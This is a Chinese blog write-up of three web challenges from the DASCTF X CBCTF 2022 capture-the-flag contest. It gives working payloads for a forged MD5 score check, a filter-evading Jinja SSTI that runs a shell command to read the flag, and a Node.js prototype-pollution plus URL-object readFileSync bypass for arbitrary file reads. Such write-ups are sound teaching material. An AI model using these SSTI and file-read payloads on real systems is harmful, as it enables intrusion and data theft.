DASCTF X CBCTF 2022

最新推荐文章于 2024-07-08 19:08:19 发布
最新推荐文章于 2024-07-08 19:08:19 发布
阅读量775 收藏 1
点赞数
分类专栏: WP 文章标签: json php 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/not_code_god/article/details/126953258
版权

web

dino3d

金典前端小游戏,但是这道题的flag是放在后端的check.php,传入三个参数,socre token 和tm时间戳,首先定位到关键代码

sn(e, t) {
        e && t && fetch("/check.php", {
            method: "POST",
            headers: {
                "Content-type": "application/x-www-form-urlencoded; charset=UTF-8"
            },
            body: "score=" + parseInt(e).toString() + "&checkCode=" + md5(parseInt(e).toString() + t) + "&tm=" + (+new Date).toString().substring(0, 10)
        }).then(e=>e.text()).then(e=>alert(e))
    }

很明显就是一个接口,这里的token生成方式为md5(parseInt(e).toString() + t),t就是salt,并且数固定值

image-20220919005530489

var salt = "_wElc03e";
var checkCode = "DASxCBCTF" + salt;

这里我就直接解出题目的js环境,在控制台里面直接传参了

image-20220919005741159

payload

var s = "DASxCBCTF_wElc03e";
console.log(game.sn(10000000, s));

Text Reverser

简单的ssti,也没啥过滤,就过滤了个命令执行执行的关键词以及{{双花括号,可以直接由{%print()%}代替

下面给出exp

# -*- coding: utf-8 -*-
# @Time : 2022/9/18 12:33
# @Author : pysnow
payload = "{%print(''.__class__.__base__.__subclasses__()[200].__init__.__globals__['__builtins__']['eval'](\"__import__('os').popen('ca'+'t /f*').read()\"))%}"
print(payload[::-1])

image-20220919010041982

cbshop

const fs = require('fs');
const express = require('express');
const session = require('express-session');
const bodyParse = require('body-parser');
const app = express();
const PORT = process.env.PORT || 80;
const SECRET = process.env.SECRET || "cybershop_challenge_secret"

const adminUser = {
    username: "admin",
    password: "😀admin😀",
    money: 9999
};

app.use(bodyParse.urlencoded({extended: false}));
app.use(express.json());
app.use(session({
    secret: SECRET,  
    saveUninitialized: false,  
    resave: false, 
    cookie: { maxAge: 3600 * 1000 }
}));
app.use(express.static("static"));

app.get('/isLogin', function(req, res) {
    if(req.session.username) {
        return res.json({
            code: 2,
            username: req.session.username,
            money: req.session.money
        });
    }else{
        return res.json({code: 0, msg: 'Please login!'});
    }
});


app.post('/login', function(req, res) {
    let username = req.body.username;
    let password = req.body.password;
    if (typeof username !== 'string' || username === '' || typeof password !== 'string' || password === '') {
        return res.json({code: 4, msg: 'illegal username or password!'})
    }

    if(username === adminUser.username && password === adminUser.password.substring(1,6)) {//only admin need password
        req.session.username = username;
        req.session.money = adminUser.money;
        return res.json({
            code: 1,
            username: username,
            money: req.session.money,
            msg: 'admin login success!'
        });
    }
    req.session.username = username;
    req.session.money = 10;
    return res.json({
        code: 1,
        username: username,
        money: req.session.money,
        msg: `${username} login success!`
    });
});

app.post('/changeUsername', function(req, res) {
    if(!req.session.username) {
        return res.json({
            code: 0,
            msg: 'please login!'
        });
    }
    let username = req.body.username;
    if (typeof username !== 'string' || username === '') {
        return res.json({code: 4, msg: 'illegal username!'})
    }
    req.session.username = username;
    return res.json({
        code: 2,
        username: username,
        money: req.session.money,
        msg: 'Username change success'
    });
});

//购买商品的接口
function buyApi(user, product) {
    let order = {};
    if(!order[user.username]) {
        order[user.username] = {};
    }

    Object.assign(order[user.username], product);

    if(product.id === 1) {             //buy fakeFlag
        if(user.money >= 10) {
            user.money -= 10;
            Object.assign(order, { msg:  fs.readFileSync('/fakeFlag').toString() });
        }else{
            Object.assign(order,{ msg: "you don't have enough money!" });
        }
    }else if(product.id === 2) {        //buy flag
        if(user.money >= 11 && user.token) {  //do u have token?
            if(JSON.stringify(product).includes("flag")) {
                Object.assign(order,{ msg: "hint: go to 'readFileSync'!!!!" });
            }else{
                user.money -= 11;
                Object.assign(order,{ msg: fs.readFileSync(product.name).toString() });
            }
        }else {
            Object.assign(order,{ msg: "nononono!" });
        }
    }else {
        Object.assign(order,{ code: 0, msg: "no such product!" });
    }
    Object.assign(order, { username: user.username, code: 3, money: user.money });
    return order;
}

app.post('/buy', function(req, res) {
    if(!req.session.username) {
        return res.json({
            code: 0,
            msg: 'please login!'
        });
    }
    var user = {
        username: req.session.username,
        money: req.session.money
    };
    var order = buyApi(user, req.body);
    req.session.money = user.money;
    res.json(order);
});

app.get('/logout', function(req, res) {
    req.session.destroy();
    return res.json({
        code: 0,
        msg: 'logout success!'
    });
});

app.listen(PORT, () => {console.log(`APP RUN IN ${PORT}`)});
获取admin账号

关键代码

if(username === adminUser.username && password === adminUser.password.substring(1,6))

截取第一位到第6位,首先把题目给的password unicode编码一下

image-20220919010743275

\ud83d\ude00\u0061\u0064\u006d\u0069\u006e\ud83d\ude00,截取后为

\ude00\u0061\u0064\u006d\u0069

image-20220919010809325

登陆成功

原型链污染

image-20220919011032163

如果进入*if*(*user*.money >= 11 && *user*.token)就要,就要凭空出现个token参数,很显然这里是没有,要是没有怎么办,js会向它的原型链上寻找该参数,刚好这里又存在污染点

Object.assign(order[*user*.username], *product*);

直接让username的值为__proto__,合并product到order对象的原型链上

payload如下

image-20220919012838607

image-20220919012919830

成功进入文件读取

URL对象绕过

image-20220919013012460

这里存在一个关键词过滤,过滤了flag关键词,但是可以任意读文件的

image-20220919013114386

这里其实是国外一个比赛的原题(corCTF2022 simplewaf),具体可以移步这篇文章https://pysnow.cn/archives/330/

大概说一下,就是readFileSync这个原生函数其实是可以传入一个URL对象的,URL对象会自动URL解码,这样就可以通过URL编码绕过waf了,具体的源码分析可以去我那篇文章看,最好自己试着跟进一下,还是非常有意思的

下面给出payload

{"token":"",
"name":
{
	"href":"a",
	"origin":"b",
	"pathname":"/fl%61g",
	"protocol":"file:",
	"hostname":""
}
,"id":2}

image-20220919013410668

Pysnow
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
ctf常见的编码
weixin_44255856的博客
05-03 1万+
二进制: 二进制是计算技术中广泛采用的一种数制。二进制数据是用0和1两个数码来表示的数。它的基数为2,进位规则是“逢二进一”,借位规则是“借一当二”,由18世纪德国数理哲学大师莱布尼兹发现。当前的计算机系统使用的基本上是二进制系统,数据在计算机中主要是以补码的形式存储的。计算机中的二进制则是一个非常微小的开关,用“开”来表示1,“关”来表示0。 二进制实例:1110111100110–》7654 ...
XCTF 简单的文件包含
weixin_69830800的博客
11-13 934
简单的文件包含,泰山
2022天工杯CTF---crypto1 wp
3tefanie丶zhou的博客
07-20 1260
【大概世间有一种自讨苦吃,叫做设身处地,处处为他人着想。】
DASCTF X CBCTF cbshop
m0_62422842的博客
09-22 975
node.js的代码审计,原型链污染
DASCTF X CBCTF 2022九月挑战赛WEB复盘
m0_61206225的博客
09-21 478
dino3d Text Reverser cbshop JavaMaster
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
安恒_务实的网络安全.pdf
08-15
安恒_务实的网络安全 业务安全
Ant & SVN task script
11-17
it's very article which introduece svn task work with ant script in your project.
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1293
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
DASCTF X CBCTF 2022九月挑战赛
shinygod的博客
10-19 666
找给 check.php 发包的那个部分。可以在开发者工具里全局搜索一下,发现是 sn 这个函数发的包,代码有点乱可以。在 sn 函数中看到了三个参数的设置。先看一下是在哪边调用的 sn ,然后一个一个的跟踪就行了。搜索 checkCode ,checkCode 由一串字符串和 salt 构成,而 tm 是时间戳,score 是分数,最后就可以构造 exp了。
2022DASCTF X SU 三月春季挑战赛 web复现
akxnxbshai的博客
06-12 996
2022DASCTF X SU 三月春季挑战赛复现一下。
DASCTF X CBCTF 2022九月挑战赛 Text Reverser
qq_64201116的博客
09-18 552
那就用脚本或者在线工具讲构造好的payload反序一下。被过滤了就用{%print%}的形式。Fuzz一波,看一下过滤情况。
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 665
胡小楠的刷题日常
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2513
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
HTTP Client
最新发布
Mr.xing的博客
07-08 77
从jdk9开始引入HTTP Client 标准化,根据用户的反馈在jdk10开始更新,有了显著的改进,使用方式基本保持不变。通过CompletableFutures提供了非阻塞请求和响应式。流量控制可以在java.util.concurrent.Flow API 提供支持。在jdk9和jdk10时进行时几乎完全重写了实现,实现了完全异步,以前的http1.1实现是阻塞的,RX Flow概念的使用已经实现,现在可以更容易的跟踪数据流:从用户请求发布者和响应订阅者,一直到底层套接字。
Exploting an API endpoiint using documentation
fencecat的博客
07-05 1104
Exploting an API endpoiint using documentation
JWT(JSON Web Token)
Casual_Lei的博客
07-03 1313
JWT 提供了一种简洁而强大的方式来进行身份验证和授权,特别适用于分布式系统和微服务架构。Spring Security 通过其强大的扩展机制,使得与 JWT 的集成变得非常简单和高效。通过了解和应用这些技术,开发者可以构建出安全、可靠的现代 Web 应用。
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pysnow

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值